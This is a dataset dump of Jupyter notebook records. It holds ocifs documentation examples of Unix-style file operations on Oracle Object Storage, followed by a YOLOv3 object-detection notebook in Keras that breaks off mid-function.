models\nmatplotlib.use('Agg')\n\n!python tf_models/models/research/object_detection/model_main_tf2.py \\\n --alsologtostderr \\\n --model_dir=$model_dir \\\n --pipeline_config_path=$pipeline_config_path \\\n --checkpoint_dir=$trained_checkpoint_dir", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown", "markdown", "markdown" ], [ "code", "code", "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code", "code" ] ]
cb1f714112377c17096666e379766783df699980
10,710
ipynb
Jupyter Notebook
docs/source/unix-operations.ipynb
LaudateCorpus1/ocifs
368bf90a5e58fa8641cf9a114d793814e5a3e638
[ "UPL-1.0", "BSD-3-Clause" ]
null
null
null
docs/source/unix-operations.ipynb
LaudateCorpus1/ocifs
368bf90a5e58fa8641cf9a114d793814e5a3e638
[ "UPL-1.0", "BSD-3-Clause" ]
null
null
null
docs/source/unix-operations.ipynb
LaudateCorpus1/ocifs
368bf90a5e58fa8641cf9a114d793814e5a3e638
[ "UPL-1.0", "BSD-3-Clause" ]
null
null
null
26.842105
379
0.569561
[ [ [ "Copyright (c) 2021, 2022 Oracle and/or its affiliates.\nLicensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/", "_____no_output_____" ], [ "## Unix Operations", "_____no_output_____" ], [ "_Important: The ocifs SDK isn't a one-to-one adaptor of OCI Object Storage and UNIX filesystem operations. It's a set of convenient wrappings to assist Pandas in natively reading from Object Storage. It supports many of the common UNIX functions, and many of the Object Storage API though not all._\n\nFollowing are examples of some of the most popular filesystem and file methods. First, you must instantiate your region-specific filesystem instance:", "_____no_output_____" ] ], [ [ "from ocifs import OCIFileSystem\n\nfs = OCIFileSystem(config=\"~/.oci/config\")", "_____no_output_____" ] ], [ [ "### Filesystem Operations\n\n#### list\nList the files in a bucket or subdirectory using `ls`:", "_____no_output_____" ] ], [ [ "fs.ls(\"bucket@namespace/\")\n# ['bucket@namespace/file.txt', \n# 'bucket@namespace/data.csv', \n# 'bucket@namespace/folder1/', \n# 'bucket@namespace/folder2/']", "_____no_output_____" ] ], [ [ "`list` has the following args: 1) `compartment_id`: a specific compartment from which to list. 2)`detail`: If true, return a list of dictionaries with various details about each object. 3)`refresh`: If true, ignore the cache and pull fresh.", "_____no_output_____" ] ], [ [ "fs.ls(\"bucket@namespace/\", detail=True)\n# [{'name': 'bucket@namespace/file.txt', \n# 'etag': 'abcdefghijklmnop',\n# 'type': 'file',\n# 'timeCreated': <timestamp when artifact created>,\n# ... },\n# ...\n# ]", "_____no_output_____" ] ], [ [ "#### touch\nThe UNIX `touch` command creates empty files in Object Storage. The `data` parameter accepts a bytestream and writes it to the new file.", "_____no_output_____" ] ], [ [ "fs.touch(\"bucket@namespace/newfile\", data=b\"Hello World!\")", "_____no_output_____" ], [ "fs.cat(\"bucket@namespace/newfile\")\n# \"Hello World!\"", "_____no_output_____" ] ], [ [ "#### copy\nThe `copy` method is a popular UNIX method, and it has a special role in ocifs as the only method capable of cross-tenancy calls. Your IAM Policy must permit you to read and write cross-region to use the `copy` method cross-region. Note: Another benefit of `copy` is that it can move large data between locations in Object Storage without needing to store anything locally.", "_____no_output_____" ] ], [ [ "fs.copy(\"bucket@namespace/newfile\", \"bucket@namespace/newfile-sydney\",\n destination_region=\"ap-sydney-1\")", "_____no_output_____" ] ], [ [ "#### rm\nThe `rm` method is another essential UNIX filesystem method. It accepts one additional argument (beyond the path), `recursive`. When `recursive=True`, it is equivalent to an `rm -rf` command. 
It deletes all files underneath the prefix.", "_____no_output_____" ] ], [ [ "fs.exists(\"oci://bucket@namespace/folder/file\")\n# True", "_____no_output_____" ], [ "fs.rm(\"oci://bucket@namespace/folder\", recursive=True)", "_____no_output_____" ], [ "fs.exists(\"oci://bucket@namespace/folder/file\")\n# False", "_____no_output_____" ] ], [ [ "#### glob\nFsspec implementations, including ocifs, support UNIX glob patterns, see [Globbing](https://man7.org/linux/man-pages/man7/glob.7.html).", "_____no_output_____" ] ], [ [ "fs.glob(\"oci://bucket@namespace/folder/*.csv\")\n# [\"bucket@namespace/folder/part1.csv\", \"bucket@namespace/folder/part2.csv\"]", "_____no_output_____" ] ], [ [ "Dask has special support for reading from and writing to a set of files using glob expressions (Pandas doesn't support glob), see [Dask's Glob support](https://docs.dask.org/en/latest/remote-data-services.html).", "_____no_output_____" ] ], [ [ "from dask import dataframe as dd\n\nddf = dd.read_csv(\"oci://bucket@namespace/folder/*.csv\")\nddf.to_csv(\"oci://bucket@namespace/folder_copy/*.csv\")", "_____no_output_____" ] ], [ [ "#### walk\n\nUse the UNIX `walk` method for iterating through the subdirectories of a given path. This is a valuable method for determining every file within a bucket or folder.", "_____no_output_____" ] ], [ [ "fs.walk(\"oci://bucket@namespace/folder\")\n# [\"bucket@namespace/folder/part1.csv\", \"bucket@namespace/folder/part2.csv\",\n# \"bucket@namespace/folder/subdir/file1.csv\", \"bucket@namespace/folder/subdir/file2.csv\"]", "_____no_output_____" ] ], [ [ "#### open\nThis method opens a file and returns an `OCIFile` object. There are examples of what you can do with an `OCIFile` in the next section.", "_____no_output_____" ], [ "### File Operations\nAfter calling open, you get an `OCIFile` object, which is subclassed from fsspec's `AbstractBufferedFile`. This file object can do almost everything a UNIX file can. 
Following are a few examples, see [a full list of methods](https://filesystem-spec.readthedocs.io/en/latest/api.html?highlight=AbstractFileSystem#fsspec.spec.AbstractBufferedFile).", "_____no_output_____" ], [ "#### read\nThe `read` method works exactly as you would expect with a UNIX file:", "_____no_output_____" ] ], [ [ "import fsspec\n\nwith fsspec.open(\"oci://bucket@namespace/folder/file\", 'rb') as f:\n buffer = f.read()", "_____no_output_____" ], [ "with fs.open(\"oci://bucket@namespace/folder/file\", 'rb') as f:\n buffer = f.read()", "_____no_output_____" ], [ "file = fs.open(\"oci://bucket@namespace/folder/file\")\nbuffer = file.read()\nfile.close()", "_____no_output_____" ] ], [ [ "#### seek\nThe `seek` method is also valuable in navigating files:", "_____no_output_____" ] ], [ [ "fs.touch(\"bucket@namespace/newfile\", data=b\"Hello World!\")\nwith fs.open(\"bucket@namespace/newfile\") as f:\n f.seek(3)\n print(f.read(1))\n f.seek(0)\n print(f.read(1))\n\n# l\n# H", "_____no_output_____" ] ], [ [ "#### write\nYou can use the `write` operation:", "_____no_output_____" ] ], [ [ "with fsspec.open(\"oci://bucket@namespace/newfile\", 'wb') as f:\n buffer = f.write(b\"new text\")\n \nwith fsspec.open(\"oci://bucket@namespace/newfile\", 'rb') as f:\n assert f.read() == b\"new text\"", "_____no_output_____" ] ], [ [ "### Learn More\nThere are many more operations that you can use with `ocifs`, see the [AbstractBufferedFile spec](https://filesystem-spec.readthedocs.io/en/latest/api.html?highlight=AbstractFileSystem#fsspec.spec.AbstractBufferedFile) and the [AbstractFileSystem spec](https://filesystem-spec.readthedocs.io/en/latest/api.html?highlight=AbstractFileSystem#fsspec.spec.AbstractFileSystem).", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ] ]
cb1f741df969338a7c1ccdfd51b55cba71ad8071
34,358
ipynb
Jupyter Notebook
experiments/YOLOv3/PART2_Yolov3_Object_Detection.ipynb
moeraza/juice-box
6bf9ae9bf95ebc68ef0620466467e97ff4260774
[ "MIT" ]
1
2021-02-18T02:16:17.000Z
2021-02-18T02:16:17.000Z
experiments/YOLOv3/PART2_Yolov3_Object_Detection.ipynb
moeraza/juice-box
6bf9ae9bf95ebc68ef0620466467e97ff4260774
[ "MIT" ]
null
null
null
experiments/YOLOv3/PART2_Yolov3_Object_Detection.ipynb
moeraza/juice-box
6bf9ae9bf95ebc68ef0620466467e97ff4260774
[ "MIT" ]
null
null
null
39.356243
146
0.502212
[ [ [ "## **Yolov3 Algorithm**", "_____no_output_____" ] ], [ [ "import struct\nimport numpy as np\nimport pandas as pd\nimport os\nfrom keras.layers import Conv2D\nfrom keras.layers import Input\nfrom keras.layers import BatchNormalization\nfrom keras.layers import LeakyReLU\nfrom keras.layers import ZeroPadding2D\nfrom keras.layers import UpSampling2D\nfrom keras.layers.merge import add, concatenate\nfrom keras.models import Model", "_____no_output_____" ] ], [ [ "**Access Google Drive**", "_____no_output_____" ] ], [ [ "# Load the Drive helper and mount\nfrom google.colab import drive\n\ndrive.mount('/content/drive')", "Drive already mounted at /content/drive; to attempt to forcibly remount, call drive.mount(\"/content/drive\", force_remount=True).\n" ] ], [ [ "**Residual Block** \n\nformula: y=F(x) + x", "_____no_output_____" ] ], [ [ "def _conv_block(inp, convs, skip=True):\n\tx = inp\n\tcount = 0\n\tfor conv in convs:\n\t\tif count == (len(convs) - 2) and skip:\n\t\t\tskip_connection = x\n\t\tcount += 1\n\t\tif conv['stride'] > 1: x = ZeroPadding2D(((1,0),(1,0)))(x) #padding as darknet prefer left and top\n\t\tx = Conv2D(conv['filter'],\n\t\t\t\t conv['kernel'],\n\t\t\t\t strides=conv['stride'],\n\t\t\t\t padding='valid' if conv['stride'] > 1 else 'same', # padding as darknet prefer left and top\n\t\t\t\t name='conv_' + str(conv['layer_idx']),\n\t\t\t\t use_bias=False if conv['bnorm'] else True)(x)\n\t\tif conv['bnorm']: x = BatchNormalization(epsilon=0.001, name='bnorm_' + str(conv['layer_idx']))(x)\n\t\tif conv['leaky']: x = LeakyReLU(alpha=0.1, name='leaky_' + str(conv['layer_idx']))(x)\n\treturn add([skip_connection, x]) if skip else x", "_____no_output_____" ] ], [ [ "**Create Yolov3 Architecture**\n\nThree output layers: 82, 94, 106", "_____no_output_____" ] ], [ [ "def make_yolov3_model():\n\tinput_image = Input(shape=(None, None, 3))\n\t# Layer 0 => 4\n\tx = _conv_block(input_image, [{'filter': 32, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 0},\n\t\t\t\t\t\t\t\t {'filter': 64, 'kernel': 3, 'stride': 2, 'bnorm': True, 'leaky': True, 'layer_idx': 1},\n\t\t\t\t\t\t\t\t {'filter': 32, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 2},\n\t\t\t\t\t\t\t\t {'filter': 64, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 3}])\n\t# Layer 5 => 8\n\tx = _conv_block(x, [{'filter': 128, 'kernel': 3, 'stride': 2, 'bnorm': True, 'leaky': True, 'layer_idx': 5},\n\t\t\t\t\t\t{'filter': 64, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 6},\n\t\t\t\t\t\t{'filter': 128, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 7}])\n\t# Layer 9 => 11\n\tx = _conv_block(x, [{'filter': 64, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 9},\n\t\t\t\t\t\t{'filter': 128, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 10}])\n\t# Layer 12 => 15\n\tx = _conv_block(x, [{'filter': 256, 'kernel': 3, 'stride': 2, 'bnorm': True, 'leaky': True, 'layer_idx': 12},\n\t\t\t\t\t\t{'filter': 128, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 13},\n\t\t\t\t\t\t{'filter': 256, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 14}])\n\t# Layer 16 => 36\n\tfor i in range(7):\n\t\tx = _conv_block(x, [{'filter': 128, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 16+i*3},\n\t\t\t\t\t\t\t{'filter': 256, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 17+i*3}])\n\tskip_36 = x\n\t# Layer 37 => 
40\n\tx = _conv_block(x, [{'filter': 512, 'kernel': 3, 'stride': 2, 'bnorm': True, 'leaky': True, 'layer_idx': 37},\n\t\t\t\t\t\t{'filter': 256, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 38},\n\t\t\t\t\t\t{'filter': 512, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 39}])\n\t# Layer 41 => 61\n\tfor i in range(7):\n\t\tx = _conv_block(x, [{'filter': 256, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 41+i*3},\n\t\t\t\t\t\t\t{'filter': 512, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 42+i*3}])\n\tskip_61 = x\n\t# Layer 62 => 65\n\tx = _conv_block(x, [{'filter': 1024, 'kernel': 3, 'stride': 2, 'bnorm': True, 'leaky': True, 'layer_idx': 62},\n\t\t\t\t\t\t{'filter': 512, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 63},\n\t\t\t\t\t\t{'filter': 1024, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 64}])\n\t# Layer 66 => 74\n\tfor i in range(3):\n\t\tx = _conv_block(x, [{'filter': 512, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 66+i*3},\n\t\t\t\t\t\t\t{'filter': 1024, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 67+i*3}])\n\t# Layer 75 => 79\n\tx = _conv_block(x, [{'filter': 512, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 75},\n\t\t\t\t\t\t{'filter': 1024, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 76},\n\t\t\t\t\t\t{'filter': 512, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 77},\n\t\t\t\t\t\t{'filter': 1024, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 78},\n\t\t\t\t\t\t{'filter': 512, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 79}], skip=False)\n\t# Layer 80 => 82\n\tyolo_82 = _conv_block(x, [{'filter': 1024, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 80},\n\t\t\t\t\t\t\t {'filter': 54, 'kernel': 1, 'stride': 1, 'bnorm': False, 'leaky': False, 'layer_idx': 81}], skip=False)\n\t# Layer 83 => 86\n\tx = _conv_block(x, [{'filter': 256, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 84}], skip=False)\n\tx = UpSampling2D(2)(x)\n\tx = concatenate([x, skip_61])\n\t# Layer 87 => 91\n\tx = _conv_block(x, [{'filter': 256, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 87},\n\t\t\t\t\t\t{'filter': 512, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 88},\n\t\t\t\t\t\t{'filter': 256, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 89},\n\t\t\t\t\t\t{'filter': 512, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 90},\n\t\t\t\t\t\t{'filter': 256, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 91}], skip=False)\n\t# Layer 92 => 94\n\tyolo_94 = _conv_block(x, [{'filter': 512, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 92},\n\t\t\t\t\t\t\t {'filter': 54, 'kernel': 1, 'stride': 1, 'bnorm': False, 'leaky': False, 'layer_idx': 93}], skip=False)\n\t# Layer 95 => 98\n\tx = _conv_block(x, [{'filter': 128, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 96}], skip=False)\n\tx = UpSampling2D(2)(x)\n\tx = concatenate([x, skip_36])\n\t# Layer 99 => 106\n\tyolo_106 = _conv_block(x, [{'filter': 128, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 99},\n\t\t\t\t\t\t\t {'filter': 256, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 100},\n\t\t\t\t\t\t\t {'filter': 128, 
'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 101},\n\t\t\t\t\t\t\t {'filter': 256, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 102},\n\t\t\t\t\t\t\t {'filter': 128, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 103},\n\t\t\t\t\t\t\t {'filter': 256, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 104},\n\t\t\t\t\t\t\t {'filter': 54, 'kernel': 1, 'stride': 1, 'bnorm': False, 'leaky': False, 'layer_idx': 105}], skip=False)\n\tmodel = Model(input_image, [yolo_82, yolo_94, yolo_106])\n\treturn model", "_____no_output_____" ] ], [ [ "**Read and Load the pre-trained model weight**", "_____no_output_____" ] ], [ [ "class WeightReader:\n\tdef __init__(self, weight_file):\n\t\twith open(weight_file, 'rb') as w_f:\n\t\t\tmajor,\t= struct.unpack('i', w_f.read(4))\n\t\t\tminor,\t= struct.unpack('i', w_f.read(4))\n\t\t\trevision, = struct.unpack('i', w_f.read(4))\n\t\t\tif (major*10 + minor) >= 2 and major < 1000 and minor < 1000:\n\t\t\t\tw_f.read(8)\n\t\t\telse:\n\t\t\t\tw_f.read(4)\n\t\t\ttranspose = (major > 1000) or (minor > 1000)\n\t\t\tbinary = w_f.read()\n\t\tself.offset = 0\n\t\tself.all_weights = np.frombuffer(binary, dtype='float32')\n\n\tdef read_bytes(self, size):\n\t\tself.offset = self.offset + size\n\t\treturn self.all_weights[self.offset-size:self.offset]\n\n\tdef load_weights(self, model):\n\t\tfor i in range(106):\n\t\t\ttry:\n\t\t\t\tconv_layer = model.get_layer('conv_' + str(i))\n\t\t\t\tprint(\"loading weights of convolution #\" + str(i))\n\t\t\t\tif i not in [81, 93, 105]:\n\t\t\t\t\tnorm_layer = model.get_layer('bnorm_' + str(i))\n\t\t\t\t\tsize = np.prod(norm_layer.get_weights()[0].shape)\n\t\t\t\t\tbeta = self.read_bytes(size) # bias\n\t\t\t\t\tgamma = self.read_bytes(size) # scale\n\t\t\t\t\tmean = self.read_bytes(size) # mean\n\t\t\t\t\tvar = self.read_bytes(size) # variance\n\t\t\t\t\tweights = norm_layer.set_weights([gamma, beta, mean, var])\n\t\t\t\tif len(conv_layer.get_weights()) > 1:\n\t\t\t\t\tbias = self.read_bytes(np.prod(conv_layer.get_weights()[1].shape))\n\t\t\t\t\tkernel = self.read_bytes(np.prod(conv_layer.get_weights()[0].shape))\n\t\t\t\t\tkernel = kernel.reshape(list(reversed(conv_layer.get_weights()[0].shape)))\n\t\t\t\t\tkernel = kernel.transpose([2,3,1,0])\n\t\t\t\t\tconv_layer.set_weights([kernel, bias])\n\t\t\t\telse:\n\t\t\t\t\tkernel = self.read_bytes(np.prod(conv_layer.get_weights()[0].shape))\n\t\t\t\t\tkernel = kernel.reshape(list(reversed(conv_layer.get_weights()[0].shape)))\n\t\t\t\t\tkernel = kernel.transpose([2,3,1,0])\n\t\t\t\t\tconv_layer.set_weights([kernel])\n\t\t\texcept ValueError:\n\t\t\t\tprint(\"no convolution #\" + str(i))\n\n\tdef reset(self):\n\t\tself.offset = 0", "_____no_output_____" ] ], [ [ "**Define the model**", "_____no_output_____" ] ], [ [ "model = make_yolov3_model()", "_____no_output_____" ] ], [ [ "**Call class WeightReader to read the weight & load to the model**", "_____no_output_____" ] ], [ [ "weight_reader = WeightReader(\"/content/drive/MyDrive/yolo_custom_model_Training/backup/test_cfg_20000.weights\")", "_____no_output_____" ], [ "weight_reader.load_weights(model)", "loading weights of convolution #0\nloading weights of convolution #1\nloading weights of convolution #2\nloading weights of convolution #3\nno convolution #4\nloading weights of convolution #5\nloading weights of convolution #6\nloading weights of convolution #7\nno convolution #8\nloading weights of convolution #9\nloading weights of convolution #10\nno 
convolution #11\nloading weights of convolution #12\nloading weights of convolution #13\nloading weights of convolution #14\nno convolution #15\nloading weights of convolution #16\nloading weights of convolution #17\nno convolution #18\nloading weights of convolution #19\nloading weights of convolution #20\nno convolution #21\nloading weights of convolution #22\nloading weights of convolution #23\nno convolution #24\nloading weights of convolution #25\nloading weights of convolution #26\nno convolution #27\nloading weights of convolution #28\nloading weights of convolution #29\nno convolution #30\nloading weights of convolution #31\nloading weights of convolution #32\nno convolution #33\nloading weights of convolution #34\nloading weights of convolution #35\nno convolution #36\nloading weights of convolution #37\nloading weights of convolution #38\nloading weights of convolution #39\nno convolution #40\nloading weights of convolution #41\nloading weights of convolution #42\nno convolution #43\nloading weights of convolution #44\nloading weights of convolution #45\nno convolution #46\nloading weights of convolution #47\nloading weights of convolution #48\nno convolution #49\nloading weights of convolution #50\nloading weights of convolution #51\nno convolution #52\nloading weights of convolution #53\nloading weights of convolution #54\nno convolution #55\nloading weights of convolution #56\nloading weights of convolution #57\nno convolution #58\nloading weights of convolution #59\nloading weights of convolution #60\nno convolution #61\nloading weights of convolution #62\nloading weights of convolution #63\nloading weights of convolution #64\nno convolution #65\nloading weights of convolution #66\nloading weights of convolution #67\nno convolution #68\nloading weights of convolution #69\nloading weights of convolution #70\nno convolution #71\nloading weights of convolution #72\nloading weights of convolution #73\nno convolution #74\nloading weights of convolution #75\nloading weights of convolution #76\nloading weights of convolution #77\nloading weights of convolution #78\nloading weights of convolution #79\nloading weights of convolution #80\nloading weights of convolution #81\nno convolution #82\nno convolution #83\nloading weights of convolution #84\nno convolution #85\nno convolution #86\nloading weights of convolution #87\nloading weights of convolution #88\nloading weights of convolution #89\nloading weights of convolution #90\nloading weights of convolution #91\nloading weights of convolution #92\nloading weights of convolution #93\nno convolution #94\nno convolution #95\nloading weights of convolution #96\nno convolution #97\nno convolution #98\nloading weights of convolution #99\nloading weights of convolution #100\nloading weights of convolution #101\nloading weights of convolution #102\nloading weights of convolution #103\nloading weights of convolution #104\nloading weights of convolution #105\n" ] ], [ [ "**We will use a pre-trained model to perform object detection**", "_____no_output_____" ] ], [ [ "import numpy as np\nfrom matplotlib import pyplot \nfrom matplotlib.patches import Rectangle\nfrom numpy import expand_dims\nfrom keras.models import load_model\nfrom keras.preprocessing.image import load_img\nfrom keras.preprocessing.image import img_to_array\n\n\n# define the expected input shape for the model\ninput_w, input_h = 416, 416", "_____no_output_____" ] ], [ [ "**Draw bounding box on the images**", "_____no_output_____" ] ], [ [ "class BoundBox:\n\tdef __init__(self, 
xmin, ymin, xmax, ymax, objness = None, classes = None):\n\t\tself.xmin = xmin\n\t\tself.ymin = ymin\n\t\tself.xmax = xmax\n\t\tself.ymax = ymax\n\t\tself.objness = objness\n\t\tself.classes = classes\n\t\tself.label = -1\n\t\tself.score = -1\n\n\tdef get_label(self):\n\t\tif self.label == -1:\n\t\t\tself.label = np.argmax(self.classes)\n\n\t\treturn self.label\n\n\tdef get_score(self):\n\t\tif self.score == -1:\n\t\t\tself.score = self.classes[self.get_label()]\n\n\t\treturn self.score\n\n\ndef _sigmoid(x):\n\treturn 1. / (1. + np.exp(-x))", "_____no_output_____" ], [ "def decode_netout(netout, anchors, obj_thresh, net_h, net_w):\n\tgrid_h, grid_w = netout.shape[:2] # 0 and 1 is row and column 13*13\n\tnb_box = 3 # 3 anchor boxes\n\tnetout = netout.reshape((grid_h, grid_w, nb_box, -1)) #13*13*3 ,-1\n\tnb_class = netout.shape[-1] - 5\n\tboxes = []\n\tnetout[..., :2] = _sigmoid(netout[..., :2])\n\tnetout[..., 4:] = _sigmoid(netout[..., 4:])\n\tnetout[..., 5:] = netout[..., 4][..., np.newaxis] * netout[..., 5:]\n\tnetout[..., 5:] *= netout[..., 5:] > obj_thresh\n\n\tfor i in range(grid_h*grid_w):\n\t\trow = i / grid_w\n\t\tcol = i % grid_w\n\t\tfor b in range(nb_box):\n\t\t\t# 4th element is objectness score\n\t\t\tobjectness = netout[int(row)][int(col)][b][4]\n\t\t\tif(objectness.all() <= obj_thresh): continue\n\t\t\t# first 4 elements are x, y, w, and h\n\t\t\tx, y, w, h = netout[int(row)][int(col)][b][:4]\n\t\t\tx = (col + x) / grid_w # center position, unit: image width\n\t\t\ty = (row + y) / grid_h # center position, unit: image height\n\t\t\tw = anchors[2 * b + 0] * np.exp(w) / net_w # unit: image width\n\t\t\th = anchors[2 * b + 1] * np.exp(h) / net_h # unit: image height\n\t\t\t# last elements are class probabilities\n\t\t\tclasses = netout[int(row)][col][b][5:]\n\t\t\tbox = BoundBox(x-w/2, y-h/2, x+w/2, y+h/2, objectness, classes)\n\t\t\tboxes.append(box)\n\treturn boxes\n\n\ndef correct_yolo_boxes(boxes, image_h, image_w, net_h, net_w):\n\tnew_w, new_h = net_w, net_h\n\tfor i in range(len(boxes)):\n\t\tx_offset, x_scale = (net_w - new_w)/2./net_w, float(new_w)/net_w\n\t\ty_offset, y_scale = (net_h - new_h)/2./net_h, float(new_h)/net_h\n\t\tboxes[i].xmin = int((boxes[i].xmin - x_offset) / x_scale * image_w)\n\t\tboxes[i].xmax = int((boxes[i].xmax - x_offset) / x_scale * image_w)\n\t\tboxes[i].ymin = int((boxes[i].ymin - y_offset) / y_scale * image_h)\n\t\tboxes[i].ymax = int((boxes[i].ymax - y_offset) / y_scale * image_h)", "_____no_output_____" ] ], [ [ "**Intersection over Union - Actual bounding box vs predicted bounding box** ", "_____no_output_____" ] ], [ [ "def _interval_overlap(interval_a, interval_b):\n\tx1, x2 = interval_a\n\tx3, x4 = interval_b\n\tif x3 < x1:\n\t\tif x4 < x1:\n\t\t\treturn 0\n\t\telse:\n\t\t\treturn min(x2,x4) - x1\n\telse:\n\t\tif x2 < x3:\n\t\t\t return 0\n\t\telse:\n\t\t\treturn min(x2,x4) - x3\n\n#intersection over union \ndef bbox_iou(box1, box2):\n\tintersect_w = _interval_overlap([box1.xmin, box1.xmax], [box2.xmin, box2.xmax])\n\tintersect_h = _interval_overlap([box1.ymin, box1.ymax], [box2.ymin, box2.ymax])\n\tintersect = intersect_w * intersect_h\n \n \n\tw1, h1 = box1.xmax-box1.xmin, box1.ymax-box1.ymin \n\tw2, h2 = box2.xmax-box2.xmin, box2.ymax-box2.ymin\n \n #Union(A,B) = A + B - Inter(A,B)\n\tunion = w1*h1 + w2*h2 - intersect\n\treturn float(intersect) / union\n", "_____no_output_____" ] ], [ [ "**Non Max Suppression - Only choose the high probability bounding boxes**", "_____no_output_____" ] ], [ [ "#boxes from correct_yolo_boxes and 
decode_netout\ndef do_nms(boxes, nms_thresh): \n\tif len(boxes) > 0:\n\t\tnb_class = len(boxes[0].classes)\n\telse:\n\t\treturn\n\tfor c in range(nb_class):\n\t\tsorted_indices = np.argsort([-box.classes[c] for box in boxes])\n\t\tfor i in range(len(sorted_indices)):\n\t\t\tindex_i = sorted_indices[i]\n\t\t\tif boxes[index_i].classes[c] == 0: continue\n\t\t\tfor j in range(i+1, len(sorted_indices)):\n\t\t\t\tindex_j = sorted_indices[j]\n\t\t\t\tif bbox_iou(boxes[index_i], boxes[index_j]) >= nms_thresh:\n\t\t\t\t\tboxes[index_j].classes[c] = 0", "_____no_output_____" ] ], [ [ "**Load and Prepare images**", "_____no_output_____" ] ], [ [ "def load_image_pixels(filename, shape):\n\t# load the image to get its shape\n\timage = load_img(filename) #load_img() Keras function to load the image .\n\twidth, height = image.size\n\t# load the image with the required size\n\timage = load_img(filename, target_size=shape) # target_size argument to resize the image after loading\n\t# convert to numpy array\n\timage = img_to_array(image)\n\t# scale pixel values to [0, 1]\n\timage = image.astype('float32')\n\timage /= 255.0 #rescale the pixel values from 0-255 to 0-1 32-bit floating point values.\n\t# add a dimension so that we have one sample\n\timage = expand_dims(image, 0)\n\treturn image, width, height", "_____no_output_____" ] ], [ [ "**Save all of the boxes above the threshold**", "_____no_output_____" ] ], [ [ "def get_boxes(boxes, labels, thresh):\n\tv_boxes, v_labels, v_scores = list(), list(), list()\n\t# enumerate all boxes\n\tfor box in boxes:\n\t\t# enumerate all possible labels\n\t\tfor i in range(len(labels)):\n\t\t\t# check if the threshold for this label is high enough\n\t\t\tif box.classes[i] > thresh:\n\t\t\t\tv_boxes.append(box)\n\t\t\t\tv_labels.append(labels[i])\n\t\t\t\tv_scores.append(box.classes[i]*100)\n\n\treturn v_boxes, v_labels, v_scores", "_____no_output_____" ] ], [ [ "**Draw all the boxes based on the information from the previous step**", "_____no_output_____" ] ], [ [ "def draw_boxes(filename, v_boxes, v_labels, v_scores):\n\t# load the image\n\tdata = pyplot.imread(filename)\n\t# plot the image\n\tpyplot.imshow(data)\n\t# get the context for drawing boxes\n\tax = pyplot.gca()\n\t# plot each box\n\tfor i in range(len(v_boxes)):\n #by retrieving the coordinates from each bounding box and creating a Rectangle object.\n \n\t\tbox = 